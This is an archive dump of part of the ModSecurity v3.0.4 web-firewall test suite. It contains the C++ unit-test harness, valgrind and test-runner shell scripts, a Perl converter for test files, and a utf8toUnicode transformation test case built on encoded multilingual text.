fun:_ZN11modsecurity6engine3Lua4loadENSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity10RuleScript4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Leak match-leak-kinds: definite fun:_Znwm fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_ fun:assign fun:operator= fun:_ZN11modsecurity6engine3Lua4loadENSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN11modsecurity10RuleScript4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Leak match-leak-kinds: definite fun:_Znwm fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE12_M_constructIPcEEvT_S7_St20forward_iterator_tag.isra.137 fun:_M_construct_aux fun:_M_construct fun:basic_string fun:RuleScript fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Leak match-leak-kinds: definite fun:malloc fun:strdup fun:main } modsecurity-v3.0.4/test/unit/0000755000175000017500000000000013607066010016442 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/unit/unit_test.h0000644000175000017500000000216613607066010020636 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #include #include #ifndef TEST_UNIT_UNIT_TEST_H_ #define TEST_UNIT_UNIT_TEST_H_ namespace modsecurity_test { class UnitTest { public: static UnitTest *from_yajl_node(yajl_val &); std::string print(); std::string param; std::string input; std::string resource; std::string name; std::string type; std::string filename; std::string output; int ret; int obtained; int skipped; std::string obtainedOutput; }; } // namespace modsecurity_test #endif // TEST_UNIT_UNIT_TEST_H_ modsecurity-v3.0.4/test/unit/unit_test.cc0000644000175000017500000001124113607066010020766 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include "test/unit/unit_test.h" #include #include #include #include #include #include "test/common/colors.h" #include "src/utils/regex.h" #include "src/utils/string.h" namespace modsecurity_test { std::string string_to_hex(const std::string& input) { static const char* const lut = "0123456789ABCDEF"; size_t len = input.length(); std::string output; output.reserve(2 * len); for (size_t i = 0; i < len; ++i) { const unsigned char c = input[i]; output.push_back(lut[c >> 4]); output.push_back(lut[c & 15]); } return output; } void replaceAll(std::string *s, const std::string &search, const char replace) { for (size_t pos = 0; ; pos += 0) { pos = s->find(search, pos); if (pos == std::string::npos) { break; } s->erase(pos, search.length()); s->insert(pos, &replace, 1); } } void json2bin(std::string *str) { modsecurity::Utils::Regex re("\\\\x([a-z0-9A-Z]{2})"); modsecurity::Utils::Regex re2("\\\\u([a-z0-9A-Z]{4})"); modsecurity::Utils::SMatch match; while (modsecurity::Utils::regex_search(*str, &match, re)) { unsigned int p; std::string toBeReplaced = match.str(); toBeReplaced.erase(0, 2); sscanf(toBeReplaced.c_str(), "%x", &p); replaceAll(str, match.str(), p); } while (modsecurity::Utils::regex_search(*str, &match, re2)) { unsigned int p; std::string toBeReplaced = match.str(); toBeReplaced.erase(0, 2); sscanf(toBeReplaced.c_str(), "%4x", &p); replaceAll(str, match.str(), p); } /* replaceAll(str, "\\0", '\0'); replaceAll(str, "\\b", '\b'); replaceAll(str, "\\t", '\t'); replaceAll(str, "\\n", '\n'); replaceAll(str, "\\r", '\r'); */ // replaceAll(str, "\\f", '\f'); } std::string UnitTest::print() { std::stringstream i; i << KRED << "Test failed." << RESET; i << " From: " << this->filename << std::endl; i << "{" << std::endl; i << " \"ret\": \"" << this->ret << "\"" << std::endl; i << " \"type\": \"" << this->type << "\"" << std::endl; i << " \"name\": \"" << this->name << "\"" << std::endl; i << " \"input\": \"" << this->input << "\"" << std::endl; i << " \"param\": \"" << this->param << "\"" << std::endl; i << " \"output\": \"" << this->output << "\"" << std::endl; i << "}" << std::endl; if (this->ret != this->obtained) { i << "Expecting: \"" << this->ret << "\" - returned: \""; i << this->obtained << "\"" << std::endl; } if (this->output != this->obtainedOutput) { i << "Expecting: \""; i << modsecurity::utils::string::toHexIfNeeded(this->output); i << "\" - returned: \""; i << modsecurity::utils::string::toHexIfNeeded(this->obtainedOutput); i << "\""; i << std::endl; } return i.str(); } UnitTest *UnitTest::from_yajl_node(yajl_val &node) { size_t num_tests = node->u.object.len; UnitTest *u = new UnitTest(); for (int i = 0; i < num_tests; i++) { const char *key = node->u.object.keys[ i ]; yajl_val val = node->u.object.values[ i ]; u->skipped = false; if (strcmp(key, "param") == 0) { u->param = YAJL_GET_STRING(val); } else if (strcmp(key, "input") == 0) { u->input = YAJL_GET_STRING(val); json2bin(&u->input); } else if (strcmp(key, "resource") == 0) { u->resource = YAJL_GET_STRING(val); } else if (strcmp(key, "name") == 0) { u->name = YAJL_GET_STRING(val); } else if (strcmp(key, "type") == 0) { u->type = YAJL_GET_STRING(val); } else if (strcmp(key, "ret") == 0) { u->ret = YAJL_GET_INTEGER(val); } else if (strcmp(key, "output") == 0) { u->output = std::string(YAJL_GET_STRING(val)); json2bin(&u->output); /* * Converting \\u0000 to \0 due to the following gcc bug: * https://gcc.gnu.org/bugzilla/show_bug.cgi?id=53690 * */ } } return u; } } // namespace modsecurity_test modsecurity-v3.0.4/test/unit/unit.cc0000644000175000017500000001445213607066010017736 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #include #include #include "modsecurity/modsecurity.h" #include "modsecurity/rules.h" #include "src/operators/operator.h" #include "src/actions/transformations/transformation.h" #include "modsecurity/transaction.h" #include "modsecurity/actions/action.h" #include "test/common/modsecurity_test.h" #include "test/common/modsecurity_test_results.h" #include "test/common/colors.h" #include "test/unit/unit_test.h" #include "src/utils/string.h" using modsecurity_test::UnitTest; using modsecurity_test::ModSecurityTest; using modsecurity_test::ModSecurityTestResults; using modsecurity::actions::transformations::Transformation; using modsecurity::operators::Operator; std::string default_test_path = "test-cases/secrules-language-tests/operators"; static std::list resources; void print_help() { std::cout << "Use ./unit /path/to/file" << std::endl; std::cout << std::endl; std::cout << std::endl; } void perform_unit_test(ModSecurityTest *test, UnitTest *t, ModSecurityTestResults* res) { std::string error; bool found = true; if (test->m_automake_output) { std::cout << ":test-result: "; } if (t->resource.empty() == false) { found = (std::find(resources.begin(), resources.end(), t->resource) != resources.end()); } if (!found) { t->skipped = true; res->push_back(t); if (test->m_automake_output) { std::cout << "SKIP "; } } if (t->type == "op") { Operator *op = Operator::instantiate(t->name, t->param); op->init(t->filename, &error); int ret = op->evaluate(NULL, NULL, t->input, NULL); t->obtained = ret; if (ret != t->ret) { res->push_back(t); if (test->m_automake_output) { std::cout << "FAIL "; } } else if (test->m_automake_output) { std::cout << "PASS "; } delete op; } else if (t->type == "tfn") { Transformation *tfn = Transformation::instantiate("t:" + t->name); std::string ret = tfn->evaluate(t->input, NULL); t->obtained = 1; t->obtainedOutput = ret; if (ret != t->output) { res->push_back(t); if (test->m_automake_output) { std::cout << "FAIL "; } } else if (test->m_automake_output) { std::cout << "PASS "; } delete tfn; } else { std::cerr << "Failed. Test type is unknown: << " << t->type; std::cerr << std::endl; } if (test->m_automake_output) { std::cout << t->name << " " << modsecurity::utils::string::toHexIfNeeded(t->input) << std::endl; } } int main(int argc, char **argv) { int total = 0; ModSecurityTest test; ModSecurityTestResults results; #if defined(WITH_GEOIP) or defined(WITH_MAXMIND) resources.push_back("geoip-or-maxmind"); #endif #if defined(WITH_MAXMIND) resources.push_back("maxmind"); #endif #if defined(WITH_GEOIP) resources.push_back("geoip"); #endif #ifdef WITH_CURL resources.push_back("curl"); #endif #ifdef WITH_SSDEEP resources.push_back("ssdeep"); #endif test.cmd_options(argc, argv); if (!test.m_automake_output) { std::cout << test.header(); } test.load_tests(); if (test.target == default_test_path) { test.load_tests("test-cases/secrules-language-tests/transformations"); } for (std::pair *> a : test) { std::vector *tests = a.second; total += tests->size(); for (UnitTest *t : *tests) { ModSecurityTestResults r; if (!test.m_automake_output) { std::cout << " " << a.first << "...\t"; } perform_unit_test(&test, t, &r); if (!test.m_automake_output) { int skp = 0; if (r.size() == 0) { std::cout << KGRN << "0 tests failed."; } else { for (auto &i : r) { if (i->skipped == true) { skp++; } } std::cout << KRED << r.size()-skp << " tests failed."; } std::cout << RESET; if (skp > 0) { std::cout << " " << std::to_string(skp) << " "; std::cout << "skipped."; } std::cout << std::endl; } results.insert(results.end(), r.begin(), r.end()); } } if (!test.m_automake_output) { std::cout << "Total >> " << total << std::endl; } for (UnitTest *t : results) { std::cout << t->print() << std::endl; } if (!test.m_automake_output) { std::cout << std::endl; std::cout << "Ran a total of: " << total << " unit tests - "; if (results.size() == 0) { std::cout << KGRN << "All tests passed" << RESET << std::endl; } else { int skp = 0; for (auto &i : results) { if (i->skipped == true) { skp++; } } std::cout << KRED << results.size()-skp << " failed."; std::cout << RESET << std::endl; if (skp > 0) { std::cout << " " << std::to_string(skp) << " "; std::cout << "skipped."; } } } for (std::pair *> a : test) { std::vector *vec = a.second; for (int i = 0; i < vec->size(); i++) { delete vec->at(i); } delete vec; } } modsecurity-v3.0.4/test/unit-tests-valgrind.sh0000755000175000017500000000022213607066010021741 0ustar zimmerlezimmerle#!/usr/bin/env bash valgrind --tool=massif ./unit-tests $* valgrind --leak-check=full --suppressions=./valgrind_suppressions.txt ./unit-tests $* modsecurity-v3.0.4/test/test-suite.sh0000755000175000017500000000104113607066010020124 0ustar zimmerlezimmerle#!/usr/bin/env bash cd test 1> /dev/null length=$(($#-1)) array=${@:1:$length} PARAM=$array FILE=${@: -1} if [[ $FILE == *"test-cases/regression/"* ]] then AMOUNT=$(./regression_tests countall ../$FILE) for i in `seq 1 $AMOUNT`; do $VALGRIND $PARAM ./regression_tests ../$FILE:$i if [ $? -eq 139 ]; then echo ":test-result: FAIL segfault: ../$FILE:$i" fi echo $VALGRIND $PARAM ./regression_tests ../$FILE:$i done; else $VALGRIND $PARAM ./unit_tests ../$FILE fi cd - 1> /dev/null modsecurity-v3.0.4/test/test-cases/0000755000175000017500000000000013607066010017536 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/test-cases/secrules-language-tests/0000755000175000017500000000000013607066311024310 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/test-cases/secrules-language-tests/utils/0000755000175000017500000000000013607066311025450 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/test-cases/secrules-language-tests/utils/import-modsec-unit-tests.pl0000755000175000017500000000210413607066311032704 0ustar zimmerlezimmerle#!/usr/bin/perl -w # # use strict; use warnings; use JSON; my $dir = $ARGV[0]; my $out = $ARGV[1]; if (!($dir && $out)) { die "Use: ./mport-modsec-unit-tests.pl /path/to/modsec/tests /path/to/dest\n\n"; } opendir(DIR, $dir) or die "Failed to open: \"$!\""; while (my $file = readdir(DIR)) { my $orig_file = $file; $file = $dir . "/" . $file; next if not ($file =~ m/\.t$/); open(CFG, "<$file") || die "Failed to open \"$file\": $!"; my @data = ; my @C; my $edata = q/@C = (/ . join("", @data) . q/)/; eval $edata; die "Failed to read test data \"$file\": $@" if ($@); unless (@C) { print "No tests defined for $file\n"; next; } print "Loaded ".@C." tests from $file\n"; my $json = to_json(\@C, {utf8 => 1, pretty => 1}); my ($new_file) = $orig_file =~ m/(.*)\.t$/; $new_file = $out . "/" . $new_file . ".json"; open (DFG, ">$new_file" ) || die "Failed to open: \"$file\": $!"; print " Saving at: " . $new_file . "\n"; print DFG $json; close(DFG); close(CFG); } closedir(DIR); modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/0000755000175000017500000000000013607066311027541 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/utf8toUnicode.json0000644000175000017500000005372113607066311033204 0ustar zimmerlezimmerle[ { "ret" : 1, "input" : "Ѐ Ё Ђ Ѓ Є Ѕ І Ї Ј Љ Њ Ћ Ќ Ѝ Ў Џ А Б В Г Д Е Ж З И Й К Л М Н О П Р С Т У Ф Ð¥ Ц Ч Ш Щ Ъ Ы Ь Э Ю Я а б в г д е ж з и й к л м н о п р с т у ф х ц ч ш щ ъ ы ь э ю я ѐ ё ђ ѓ є ѕ і ї ј љ њ ћ ќ ѝ ў џ Ñ  Ñ¡ Ñ¢ Ñ£ Ѥ Ñ¥ Ѧ ѧ Ѩ Ñ© Ѫ Ñ« Ѭ Ñ­ Ñ® ѯ Ѱ ѱ Ѳ ѳ Ñ´ ѵ Ѷ Ñ· Ѹ ѹ Ѻ Ñ» Ѽ ѽ Ѿ Ñ¿ Ҁ ҁ ҂ ҈ ҉ Ҋ ҋ Ҍ ҍ Ҏ ҏ Ґ ґ Ғ ғ Ҕ ҕ Җ җ Ҙ ҙ Қ қ Ҝ ҝ Ҟ ҟ Ò  Ò¡ Ò¢ Ò£ Ò¤ Ò¥ Ò¦ Ò§ Ò¨ Ò© Òª Ò« Ò¬ Ò­ Ò® Ò¯ Ò° Ò± Ò² Ò³ Ò´ Òµ Ò¶ Ò· Ò¸ Ò¹ Òº Ò» Ò¼ Ò½ Ò¾ Ò¿ Ӏ Ӂ ӂ Ӄ ӄ Ӆ ӆ Ӈ ӈ Ӊ ӊ Ӌ ӌ Ӎ ӎ ӏ Ӑ ӑ Ӓ ӓ Ӕ ӕ Ӗ ӗ Ә ә Ӛ ӛ Ӝ ӝ Ӟ ӟ Ó  Ó¡ Ó¢ Ó£ Ó¤ Ó¥ Ó¦ Ó§ Ó¨ Ó© Óª Ó« Ó¬ Ó­ Ó® Ó¯ Ó° Ó± Ó² Ó³ Ó´ Óµ Ó¶ Ó· Ó¸ Ó¹ Óº Ó» Ó¼ Ó½ Ó¾ Ó¿ ͵ ͺ Í» ͼ ͽ ΄ ΅ Ά Έ Ή Ί Ό Ύ Ώ ΐ Α Β Γ Δ Ε Ζ Η Θ Ι Κ Λ Μ Ν Ξ Ο Π Ρ Σ Τ Î¥ Φ Χ Ψ Ω Ϊ Ϋ ά έ ή ί ΰ α β γ δ ε ζ η θ ι κ λ μ ν ξ ο π ρ ς σ τ υ φ χ ψ ω ϊ ϋ ό ύ ώ ϐ ϑ ϒ ϓ ϔ ϕ ϖ ϗ Ϙ ϙ Ϛ ϛ Ϝ ϝ Ϟ ϟ Ï  Ï¡ Ï¢ Ï£ Ϥ Ï¥ Ϧ ϧ Ϩ Ï© Ϫ Ï« Ϭ Ï­ Ï® ϯ ϰ ϱ ϲ ϳ Ï´ ϵ ϶ Ï· ϸ Ϲ Ϻ Ï» ϼ Ͻ Ͼ Ï¿ Ö¾ ׀ ׃ ׆ א ב ג ד ה ו ז ח ט י ך כ ל ם מ ן ×  ס ×¢ ×£ פ ×¥ צ ×§ ר ש ת ×° ×± ײ ׳ ×´", "type" : "tfn", "name" : "utf8toUnicode", "output" : "%u00d0%u0080 %u00d0%u0081 %u00d0%u0082 %u00d0%u0083 %u00d0%u0084 %u00d0%u0085 %u00d0%u0086 %u00d0%u0087 %u00d0%u0088 %u00d0%u0089 %u00d0%u008a %u00d0%u008b %u00d0%u008c %u00d0%u008d %u00d0%u008e %u00d0%u008f %u00d0%u0090 %u00d0%u0091 %u00d0%u0092 %u00d0%u0093 %u00d0%u0094 %u00d0%u0095 %u00d0%u0096 %u00d0%u0097 %u00d0%u0098 %u00d0%u0099 %u00d0%u009a %u00d0%u009b %u00d0%u009c %u00d0%u009d %u00d0%u009e %u00d0%u009f %u00d0%u00a0 %u00d0%u00a1 %u00d0%u00a2 %u00d0%u00a3 %u00d0%u00a4 %u00d0%u00a5 %u00d0%u00a6 %u00d0%u00a7 %u00d0%u00a8 %u00d0%u00a9 %u00d0%u00aa %u00d0%u00ab %u00d0%u00ac %u00d0%u00ad %u00d0%u00ae %u00d0%u00af %u00d0%u00b0 %u00d0%u00b1 %u00d0%u00b2 %u00d0%u00b3 %u00d0%u00b4 %u00d0%u00b5 %u00d0%u00b6 %u00d0%u00b7 %u00d0%u00b8 %u00d0%u00b9 %u00d0%u00ba %u00d0%u00bb %u00d0%u00bc %u00d0%u00bd %u00d0%u00be %u00d0%u00bf %u00d1%u0080 %u00d1%u0081 %u00d1%u0082 %u00d1%u0083 %u00d1%u0084 %u00d1%u0085 %u00d1%u0086 %u00d1%u0087 %u00d1%u0088 %u00d1%u0089 %u00d1%u008a %u00d1%u008b %u00d1%u008c %u00d1%u008d %u00d1%u008e %u00d1%u008f %u00d1%u0090 %u00d1%u0091 %u00d1%u0092 %u00d1%u0093 %u00d1%u0094 %u00d1%u0095 %u00d1%u0096 %u00d1%u0097 %u00d1%u0098 %u00d1%u0099 %u00d1%u009a %u00d1%u009b %u00d1%u009c %u00d1%u009d %u00d1%u009e %u00d1%u009f %u00d1%u00a0 %u00d1%u00a1 %u00d1%u00a2 %u00d1%u00a3 %u00d1%u00a4 %u00d1%u00a5 %u00d1%u00a6 %u00d1%u00a7 %u00d1%u00a8 %u00d1%u00a9 %u00d1%u00aa %u00d1%u00ab %u00d1%u00ac %u00d1%u00ad %u00d1%u00ae %u00d1%u00af %u00d1%u00b0 %u00d1%u00b1 %u00d1%u00b2 %u00d1%u00b3 %u00d1%u00b4 %u00d1%u00b5 %u00d1%u00b6 %u00d1%u00b7 %u00d1%u00b8 %u00d1%u00b9 %u00d1%u00ba %u00d1%u00bb %u00d1%u00bc %u00d1%u00bd %u00d1%u00be %u00d1%u00bf %u00d2%u0080 %u00d2%u0081 %u00d2%u0082 %u00d2%u0088 %u00d2%u0089 %u00d2%u008a %u00d2%u008b %u00d2%u008c %u00d2%u008d %u00d2%u008e %u00d2%u008f %u00d2%u0090 %u00d2%u0091 %u00d2%u0092 %u00d2%u0093 %u00d2%u0094 %u00d2%u0095 %u00d2%u0096 %u00d2%u0097 %u00d2%u0098 %u00d2%u0099 %u00d2%u009a %u00d2%u009b %u00d2%u009c %u00d2%u009d %u00d2%u009e %u00d2%u009f %u00d2%u00a0 %u00d2%u00a1 %u00d2%u00a2 %u00d2%u00a3 %u00d2%u00a4 %u00d2%u00a5 %u00d2%u00a6 %u00d2%u00a7 %u00d2%u00a8 %u00d2%u00a9 %u00d2%u00aa %u00d2%u00ab %u00d2%u00ac %u00d2%u00ad %u00d2%u00ae %u00d2%u00af %u00d2%u00b0 %u00d2%u00b1 %u00d2%u00b2 %u00d2%u00b3 %u00d2%u00b4 %u00d2%u00b5 %u00d2%u00b6 %u00d2%u00b7 %u00d2%u00b8 %u00d2%u00b9 %u00d2%u00ba %u00d2%u00bb %u00d2%u00bc %u00d2%u00bd %u00d2%u00be %u00d2%u00bf %u00d3%u0080 %u00d3%u0081 %u00d3%u0082 %u00d3%u0083 %u00d3%u0084 %u00d3%u0085 %u00d3%u0086 %u00d3%u0087 %u00d3%u0088 %u00d3%u0089 %u00d3%u008a %u00d3%u008b %u00d3%u008c %u00d3%u008d %u00d3%u008e %u00d3%u008f %u00d3%u0090 %u00d3%u0091 %u00d3%u0092 %u00d3%u0093 %u00d3%u0094 %u00d3%u0095 %u00d3%u0096 %u00d3%u0097 %u00d3%u0098 %u00d3%u0099 %u00d3%u009a %u00d3%u009b %u00d3%u009c %u00d3%u009d %u00d3%u009e %u00d3%u009f %u00d3%u00a0 %u00d3%u00a1 %u00d3%u00a2 %u00d3%u00a3 %u00d3%u00a4 %u00d3%u00a5 %u00d3%u00a6 %u00d3%u00a7 %u00d3%u00a8 %u00d3%u00a9 %u00d3%u00aa %u00d3%u00ab %u00d3%u00ac %u00d3%u00ad %u00d3%u00ae %u00d3%u00af %u00d3%u00b0 %u00d3%u00b1 %u00d3%u00b2 %u00d3%u00b3 %u00d3%u00b4 %u00d3%u00b5 %u00d3%u00b6 %u00d3%u00b7 %u00d3%u00b8 %u00d3%u00b9 %u00d3%u00ba %u00d3%u00bb %u00d3%u00bc %u00d3%u00bd %u00d3%u00be %u00d3%u00bf %u00cd%u00b5 %u00cd%u00ba %u00cd%u00bb %u00cd%u00bc %u00cd%u00bd %u00ce%u0084 %u00ce%u0085 %u00ce%u0086 %u00ce%u0088 %u00ce%u0089 %u00ce%u008a %u00ce%u008c %u00ce%u008e %u00ce%u008f %u00ce%u0090 %u00ce%u0091 %u00ce%u0092 %u00ce%u0093 %u00ce%u0094 %u00ce%u0095 %u00ce%u0096 %u00ce%u0097 %u00ce%u0098 %u00ce%u0099 %u00ce%u009a %u00ce%u009b %u00ce%u009c %u00ce%u009d %u00ce%u009e %u00ce%u009f %u00ce%u00a0 %u00ce%u00a1 %u00ce%u00a3 %u00ce%u00a4 %u00ce%u00a5 %u00ce%u00a6 %u00ce%u00a7 %u00ce%u00a8 %u00ce%u00a9 %u00ce%u00aa %u00ce%u00ab %u00ce%u00ac %u00ce%u00ad %u00ce%u00ae %u00ce%u00af %u00ce%u00b0 %u00ce%u00b1 %u00ce%u00b2 %u00ce%u00b3 %u00ce%u00b4 %u00ce%u00b5 %u00ce%u00b6 %u00ce%u00b7 %u00ce%u00b8 %u00ce%u00b9 %u00ce%u00ba %u00ce%u00bb %u00ce%u00bc %u00ce%u00bd %u00ce%u00be %u00ce%u00bf %u00cf%u0080 %u00cf%u0081 %u00cf%u0082 %u00cf%u0083 %u00cf%u0084 %u00cf%u0085 %u00cf%u0086 %u00cf%u0087 %u00cf%u0088 %u00cf%u0089 %u00cf%u008a %u00cf%u008b %u00cf%u008c %u00cf%u008d %u00cf%u008e %u00cf%u0090 %u00cf%u0091 %u00cf%u0092 %u00cf%u0093 %u00cf%u0094 %u00cf%u0095 %u00cf%u0096 %u00cf%u0097 %u00cf%u0098 %u00cf%u0099 %u00cf%u009a %u00cf%u009b %u00cf%u009c %u00cf%u009d %u00cf%u009e %u00cf%u009f %u00cf%u00a0 %u00cf%u00a1 %u00cf%u00a2 %u00cf%u00a3 %u00cf%u00a4 %u00cf%u00a5 %u00cf%u00a6 %u00cf%u00a7 %u00cf%u00a8 %u00cf%u00a9 %u00cf%u00aa %u00cf%u00ab %u00cf%u00ac %u00cf%u00ad %u00cf%u00ae %u00cf%u00af %u00cf%u00b0 %u00cf%u00b1 %u00cf%u00b2 %u00cf%u00b3 %u00cf%u00b4 %u00cf%u00b5 %u00cf%u00b6 %u00cf%u00b7 %u00cf%u00b8 %u00cf%u00b9 %u00cf%u00ba %u00cf%u00bb %u00cf%u00bc %u00cf%u00bd %u00cf%u00be %u00cf%u00bf %u00d6%u00be %u00d7%u0080 %u00d7%u0083 %u00d7%u0086 %u00d7%u0090 %u00d7%u0091 %u00d7%u0092 %u00d7%u0093 %u00d7%u0094 %u00d7%u0095 %u00d7%u0096 %u00d7%u0097 %u00d7%u0098 %u00d7%u0099 %u00d7%u009a %u00d7%u009b %u00d7%u009c %u00d7%u009d %u00d7%u009e %u00d7%u009f %u00d7%u00a0 %u00d7%u00a1 %u00d7%u00a2 %u00d7%u00a3 %u00d7%u00a4 %u00d7%u00a5 %u00d7%u00a6 %u00d7%u00a7 %u00d7%u00a8 %u00d7%u00a9 %u00d7%u00aa %u00d7%u00b0 %u00d7%u00b1 %u00d7%u00b2 %u00d7%u00b3 %u00d7%u00b4" }, { "ret" : 1, "input" : "ب Ø© ت Ø« ج Ø­ Ø® د ذ ر ز س Ø´ ص ض Ø· ظ ع غ ـ ف ق ك ل م ن ه و ى ي ٖ ٗ ٘ ٙ Ù  Ù¡ Ù¢ Ù£ Ù¤ Ù¥ Ù¦ Ù§ Ù¨ Ù© Ùª Ù« Ù¬ Ù­ Ù® Ù¯ Ù± Ù² Ù³ Ù´ Ùµ Ù¶ Ù· Ù¸ Ù¹ Ùº Ù» Ù¼ Ù½ Ù¾ Ù¿ ڀ ځ ڂ ڃ ڄ څ چ ڇ ڈ ډ ڊ ڋ ڌ ڍ ڎ ڏ ڐ ڑ ڒ ړ ڔ ڕ ږ ڗ ژ ڙ ښ ڛ ڜ ڝ ڞ ڟ Ú  Ú¡ Ú¢ Ú£ Ú¤ Ú¥ Ú¦ Ú§ Ú¨ Ú© Úª Ú« Ú¬ Ú­ Ú® Ú¯ Ú° Ú± Ú² Ú³ Ú´ Úµ Ú¶ Ú· Ú¸ Ú¹ Úº Ú» Ú¼ Ú½ Ú¾ Ú¿ ۀ ہ ۂ ۃ ۄ ۅ ۆ ۇ ۈ ۉ ۊ ۋ ی ۍ ێ ۏ ې ۑ ے ۓ ۔ ە ۝ ۞ Û¥ Û¦ Û© Û® Û¯ Û° Û± Û² Û³ Û´ Ûµ Û¶ Û· Û¸ Û¹ Ûº Û» Û¼ Û½ Û¾ ", "name" : "utf8toUnicode", "type" : "tfn", "output" : "%u00d8%u00a8 %u00d8%u00a9 %u00d8%u00aa %u00d8%u00ab %u00d8%u00ac %u00d8%u00ad %u00d8%u00ae %u00d8%u00af %u00d8%u00b0 %u00d8%u00b1 %u00d8%u00b2 %u00d8%u00b3 %u00d8%u00b4 %u00d8%u00b5 %u00d8%u00b6 %u00d8%u00b7 %u00d8%u00b8 %u00d8%u00b9 %u00d8%u00ba %u00d9%u0080 %u00d9%u0081 %u00d9%u0082 %u00d9%u0083 %u00d9%u0084 %u00d9%u0085 %u00d9%u0086 %u00d9%u0087 %u00d9%u0088 %u00d9%u0089 %u00d9%u008a %u00d9%u0096 %u00d9%u0097 %u00d9%u0098 %u00d9%u0099 %u00d9%u00a0 %u00d9%u00a1 %u00d9%u00a2 %u00d9%u00a3 %u00d9%u00a4 %u00d9%u00a5 %u00d9%u00a6 %u00d9%u00a7 %u00d9%u00a8 %u00d9%u00a9 %u00d9%u00aa %u00d9%u00ab %u00d9%u00ac %u00d9%u00ad %u00d9%u00ae %u00d9%u00af %u00d9%u00b1 %u00d9%u00b2 %u00d9%u00b3 %u00d9%u00b4 %u00d9%u00b5 %u00d9%u00b6 %u00d9%u00b7 %u00d9%u00b8 %u00d9%u00b9 %u00d9%u00ba %u00d9%u00bb %u00d9%u00bc %u00d9%u00bd %u00d9%u00be %u00d9%u00bf %u00da%u0080 %u00da%u0081 %u00da%u0082 %u00da%u0083 %u00da%u0084 %u00da%u0085 %u00da%u0086 %u00da%u0087 %u00da%u0088 %u00da%u0089 %u00da%u008a %u00da%u008b %u00da%u008c %u00da%u008d %u00da%u008e %u00da%u008f %u00da%u0090 %u00da%u0091 %u00da%u0092 %u00da%u0093 %u00da%u0094 %u00da%u0095 %u00da%u0096 %u00da%u0097 %u00da%u0098 %u00da%u0099 %u00da%u009a %u00da%u009b %u00da%u009c %u00da%u009d %u00da%u009e %u00da%u009f %u00da%u00a0 %u00da%u00a1 %u00da%u00a2 %u00da%u00a3 %u00da%u00a4 %u00da%u00a5 %u00da%u00a6 %u00da%u00a7 %u00da%u00a8 %u00da%u00a9 %u00da%u00aa %u00da%u00ab %u00da%u00ac %u00da%u00ad %u00da%u00ae %u00da%u00af %u00da%u00b0 %u00da%u00b1 %u00da%u00b2 %u00da%u00b3 %u00da%u00b4 %u00da%u00b5 %u00da%u00b6 %u00da%u00b7 %u00da%u00b8 %u00da%u00b9 %u00da%u00ba %u00da%u00bb %u00da%u00bc %u00da%u00bd %u00da%u00be %u00da%u00bf %u00db%u0080 %u00db%u0081 %u00db%u0082 %u00db%u0083 %u00db%u0084 %u00db%u0085 %u00db%u0086 %u00db%u0087 %u00db%u0088 %u00db%u0089 %u00db%u008a %u00db%u008b %u00db%u008c %u00db%u008d %u00db%u008e %u00db%u008f %u00db%u0090 %u00db%u0091 %u00db%u0092 %u00db%u0093 %u00db%u0094 %u00db%u0095 %u00db%u009d %u00db%u009e %u00db%u00a5 %u00db%u00a6 